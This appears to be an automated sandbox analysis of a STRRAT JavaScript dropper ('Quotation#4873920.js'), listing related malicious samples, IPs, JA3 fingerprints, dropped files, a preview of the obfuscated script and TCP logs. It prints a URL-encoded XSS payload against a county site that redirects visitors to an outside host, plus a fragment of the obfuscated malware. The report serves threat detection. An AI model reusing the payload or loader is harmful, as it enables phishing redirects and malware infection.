                                    Proof Of Payment.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.196.209
                                    Product Specification Wire-Mesh RQF 260924.sc.exeGet hashmaliciousSTRRATBrowse
                                    • 199.232.196.209
                                    PO#518463.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.196.209
                                    PO#518463.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.196.209
                                    Proof Of Payment.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.196.209
                                    github.comhttp://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                                    • 140.82.121.4
                                    R183nzNa89.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.4
                                    hHNfR2jxEo.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    • 140.82.121.3
                                    tCNVKM4mkt.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    • 140.82.121.4
                                    R183nzNa89.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.4
                                    file.exeGet hashmaliciousXWorm, XmrigBrowse
                                    • 140.82.121.4
                                    Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 140.82.121.4
                                    Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 140.82.121.4
                                    SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 140.82.114.3

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    FASTLYUSGlobalProtect-6.3.1.pkgGet hashmaliciousUnknownBrowse
                                    • 151.101.67.6
                                    https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                    • 185.199.111.133
                                    https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                    • 185.199.111.133
                                    https://globalairt.com/arull.php?7104797967704b536932307464507a53744a4c53704a7a4d77727273784c7a7453725374524c7a732f564c3477776474594841413d3dkkirkman@ssc.nsw.gov.auGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.66.137
                                    Globalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.2.137
                                    http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                    • 151.101.194.137
                                    https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                    • 151.101.129.44
                                    Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                                    • 151.101.2.137
                                    deveba=.htmlGet hashmaliciousUnknownBrowse
                                    • 151.101.66.137
                                    FASTLYUSGlobalProtect-6.3.1.pkgGet hashmaliciousUnknownBrowse
                                    • 151.101.67.6
                                    https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                    • 185.199.111.133
                                    https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                    • 185.199.111.133
                                    https://globalairt.com/arull.php?7104797967704b536932307464507a53744a4c53704a7a4d77727273784c7a7453725374524c7a732f564c3477776474594841413d3dkkirkman@ssc.nsw.gov.auGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.66.137
                                    Globalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.2.137
                                    http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                    • 151.101.194.137
                                    https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                    • 151.101.129.44
                                    Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                                    • 151.101.2.137
                                    deveba=.htmlGet hashmaliciousUnknownBrowse
                                    • 151.101.66.137
                                    GITHUBUShttp://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                                    • 140.82.121.4
                                    R183nzNa89.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.4
                                    hHNfR2jxEo.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    • 140.82.121.3
                                    tCNVKM4mkt.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    • 140.82.121.4
                                    R183nzNa89.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.4
                                    file.exeGet hashmaliciousXWorm, XmrigBrowse
                                    • 140.82.121.4
                                    Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 140.82.121.4
                                    Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 140.82.121.4
                                    SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 140.82.114.3
                                    GITHUBUShttp://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                                    • 140.82.121.4
                                    R183nzNa89.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.4
                                    hHNfR2jxEo.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    • 140.82.121.3
                                    tCNVKM4mkt.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    • 140.82.121.4
                                    R183nzNa89.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.4
                                    file.exeGet hashmaliciousXWorm, XmrigBrowse
                                    • 140.82.121.4
                                    Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 140.82.121.4
                                    Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 140.82.121.4
                                    SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 140.82.114.3

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    026e5ca865ce1f09da3a81d8a4e3effbRequest For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209
                                    Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209
                                    PO#518464.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209
                                    PO#518464.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209
                                    Proof Of Payment.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209
                                    Product Specification Wire-Mesh RQF 260924.sc.exeGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209
                                    PO#518463.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209
                                    PO#518463.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209
                                    Proof Of Payment.jsGet hashmaliciousSTRRATBrowse
                                    • 199.232.192.209
                                    • 140.82.121.3
                                    • 140.82.121.4
                                    • 199.232.196.209

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp

                                    Download File
                                    Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):52
                                    Entropy (8bit):4.950063756436211
                                    Encrypted:false
                                    SSDEEP:3:oFj4I5vpm4US5nSWy:oJ5bdly
                                    MD5:785156B855744395A29915CC4692D835
                                    SHA1:B56B6D4D88DC37052EABACC2A72349B2CDA500A8
                                    SHA-256:9ABB31B5CF2CA6303CFB0D33AF8843044A18C6F5674CD56BEA551297DD7E618E
                                    SHA-512:2C371E31677529176A1A99C1891E7502C846DC4386B75C85CC41F2F20170CD7A8073BF78347CCA73D91C21313AACBA0E696504A6BF886C31D3824EC05524DA8D
                                    Malicious:false
                                    Reputation:low
                                    Preview:C:\Program Files (x86)\Java\jre-1.8..1727940277853..

                                    C:\Users\user\AppData\Local\Temp\hsperfdata_user\6556

                                    Download File
                                    Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.28710097398654
                                    Encrypted:false
                                    SSDEEP:96:oTeKrlur8G677pCnr9h66XqveX2LScOwYqmuSJ1HG1bow2:oTeHr8GqpCnr9h6u2mcOzqm1zHGd
                                    MD5:44CA263D959F5E567AD459C4687276FE
                                    SHA1:B4A01A5A74AF29A596A8DF7CC976DB8294EC4807
                                    SHA-256:A30E74B0C6A9D0718BA03E2234AD45B3F22C847C4E9BE27FA1ADEA2D6DF4CD5F
                                    SHA-512:3CF2EC2E753AF97A8C288E5A91FEBED7FC1001B055943147336A40301663157D7BFA0BB11A61E5F82498895AFD28B830F53AAB670BDACE40E3F9FDDEFC356720
                                    Malicious:false
                                    Reputation:low
                                    Preview:.........8........'..... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..h.......8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..6.......@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06

                                    Download File
                                    Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):45
                                    Entropy (8bit):0.9111711733157262
                                    Encrypted:false
                                    SSDEEP:3:/lwlt7n:WNn
                                    MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                    SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                    SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                    SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:........................................J2SE.

                                    C:\Users\user\AppData\Roaming\rybdyjbhxf.txt

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):94792
                                    Entropy (8bit):7.908549599832845
                                    Encrypted:false
                                    SSDEEP:1536:we//1APYP119QV1+jG4cRtnGS2Ps0470ipLeejtTNDJheJdGHGvavxTpSHrsn:weaPYP1rQajoGfPR4Ai9eepToJdfvPLE
                                    MD5:2CC7E15396DC275497FCF51F461DA38D
                                    SHA1:6FA0F11B6D9E3812A86FF1D43A86AD34BFC41062
                                    SHA-256:E14F1C7E11A1F1DDD570D605E4204A694A7370D603C1B1CA157E505F180CCC48
                                    SHA-512:DAF71473C48F9592D33A49FF2F6D7B84E2C3A992F18A29979494CAE86623328F0137C6AE9046CF3BBEB75D90D2A030D1FDBF3ACA8718EA769429CE1E6E4A931F
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
                                    Preview:PK........*..X................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5|.Y.~.m..5XL.8.(WXkV*.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.|.....s...%.u....0..>8.8..PK...&......-...PK........*..X................carLambo/resources/config.txt.... ....j.6..h..H..d?..:f.)Z.QO......Q......(..@.>...;..Y5`d#..m.~.c..9....*..n>.2A..r....Jo..b9..".xd.Y.T1.<......`*.....f.m.r.....Q;i=.Y..4i...9...".W.....y.K....,::....j..PK....E........PK........*..X................carLambo/sfsrgsbd.class.Wy|T....,y/.!.d!.([.1CXB.$.D,.D...@.L..,0..y/.T"....v....5UiM.v....l..b.E....V...=..d&........w.=..s....=.....P........L.0.oV...&......F...N...n..H..0*!"..I.....1.... .+....%._............_...._.xZ.3"~-.7"~+.w"~..EP.|.~.^.~...C.73.ex.......t,..2..p.."..T...F.72..p.a..q..+.g.b\o#/o`.2.......a..3x.B....G...Af8..6.^...#6..JE.n.....n.@%..x..g...'.>k...._.....>.p.'.....v|.G.....v<.O..c|...=

                                    Static File Info

                                    General

                                    File type:ASCII text, with very long lines (64556)
                                    Entropy (8bit):5.6300233818893055
                                    TrID:
                                      File name:Quotation#4873920.js
                                      File size:212'648 bytes
                                      MD5:0444071c6c7d8675aa708e00bdad9787
                                      SHA1:639c3c2fc315ce73b3d179be4ba1fa8c94644c9b
                                      SHA256:cb19162767f15a3043137f8124c6df663861b6537b28cfe7d930fd18cec33c6b
                                      SHA512:1b32599cff480157f6d2030d088caf71983cdbca12073dde4a83580f92e93fc4f202272e9ccbc21b25a8a6afe228fdf2ca3e571a18bdd5bb0207db2542a56ae8
                                      SSDEEP:6144:HQxCFBSSouokamJqydZZeL9ekQNMwMS0TrqLHEwnHj:w4tLS5VajT
                                      TLSH:82245A8ED38D3F3BD9F44044DC972352426B865E98858079A1616FEECB637A9332FC49
                                      File Content Preview:String["prototype"].proc = function() { eval(this.toString());};.String["prototype"]["\x75\x6E\x64\x65\x66\x69\x6E\x65\x64"] = function(xx, xy) {.var ibz = 0;.do{xx[ibz+3] = xy[ibz];ibz+=1;}while(ibz < 3);.};.String.\u0070\u0072\u006f\u0074\u006f\u0074\u0

                                      File Icon

                                      Icon Hash:68d69b8bb6aa9a86

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 3, 2024 09:24:40.831478119 CEST49704443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.831526995 CEST44349704199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:40.831598997 CEST49704443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.832612038 CEST49705443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:40.832648039 CEST44349705140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:40.832704067 CEST49705443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:40.833200932 CEST49706443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.833250046 CEST44349706199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:40.833916903 CEST49706443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.834162951 CEST49707443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.834172964 CEST44349707199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:40.834227085 CEST49707443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.925333023 CEST49706443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.925358057 CEST44349706199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:40.926234961 CEST49707443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.926265955 CEST44349707199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:40.926562071 CEST49705443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:40.926588058 CEST44349705140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:40.926717043 CEST49704443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:40.926728010 CEST44349704199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.485132933 CEST44349706199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.485238075 CEST49706443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.486192942 CEST44349707199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.486283064 CEST49707443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.495309114 CEST44349704199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.495436907 CEST49704443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.538901091 CEST49706443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.538912058 CEST49707443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.538933992 CEST44349706199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.538959026 CEST44349707199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.539206982 CEST44349707199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.539210081 CEST49706443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.539217949 CEST49707443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.539239883 CEST44349707199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.539273024 CEST49707443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.539316893 CEST49704443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.539339066 CEST44349704199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.539417982 CEST49704443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.539467096 CEST44349706199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.539518118 CEST44349704199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:41.539539099 CEST49706443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.539591074 CEST49704443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:41.563441038 CEST44349705140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:41.563539982 CEST49705443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:41.566039085 CEST49705443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:41.566056967 CEST44349705140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:41.566162109 CEST49705443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:41.566245079 CEST44349705140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:41.566301107 CEST49705443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:46.550307035 CEST49708443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.550368071 CEST44349708199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:46.550477982 CEST49708443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.552557945 CEST49708443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.552580118 CEST44349708199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:46.552937031 CEST49709443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.552985907 CEST44349709199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:46.553052902 CEST49709443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.554169893 CEST49709443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.554181099 CEST44349709199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:46.554532051 CEST49710443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.554541111 CEST44349710199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:46.554600954 CEST49710443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.555398941 CEST49710443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:46.555407047 CEST44349710199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:46.565630913 CEST49711443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:46.565673113 CEST44349711140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:46.565751076 CEST49711443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:46.566688061 CEST49711443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:46.566698074 CEST44349711140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:47.009602070 CEST44349708199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.009675026 CEST49708443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.011312008 CEST49708443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.011327982 CEST44349708199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.011462927 CEST49708443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.011477947 CEST44349708199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.011539936 CEST49708443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.015775919 CEST44349709199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.015853882 CEST49709443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.017083883 CEST49709443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.017093897 CEST44349709199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.017179966 CEST49709443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.017232895 CEST44349709199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.017280102 CEST49709443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.110261917 CEST44349710199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.110343933 CEST49710443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.111507893 CEST49710443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.111517906 CEST44349710199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.111632109 CEST49710443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.111752033 CEST44349710199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:47.111803055 CEST49710443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:47.191242933 CEST44349711140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:47.191402912 CEST49711443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:47.193226099 CEST49711443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:47.193244934 CEST44349711140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:47.193403959 CEST44349711140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:47.193411112 CEST49711443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:47.193418980 CEST44349711140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:47.193451881 CEST49711443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:52.003843069 CEST49712443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.003846884 CEST49713443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.003889084 CEST44349712199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.003907919 CEST44349713199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.004015923 CEST49712443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.004048109 CEST49713443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.005044937 CEST49713443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.005064011 CEST44349713199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.005420923 CEST49712443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.005439997 CEST44349712199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.115663052 CEST49714443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.115727901 CEST44349714199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.115803957 CEST49714443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.116996050 CEST49714443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.117016077 CEST44349714199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.206589937 CEST49715443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:52.206651926 CEST44349715140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:52.206852913 CEST49715443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:52.207751989 CEST49715443192.168.2.5140.82.121.3
                                      Oct 3, 2024 09:24:52.207770109 CEST44349715140.82.121.3192.168.2.5
                                      Oct 3, 2024 09:24:52.456598043 CEST44349712199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.456693888 CEST49712443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.458393097 CEST49712443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.458404064 CEST44349712199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.458529949 CEST49712443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.458600044 CEST44349712199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.458655119 CEST49712443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.485641003 CEST44349713199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:24:52.485760927 CEST49713443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:24:52.486841917 CEST49713443192.168.2.5199.232.192.209
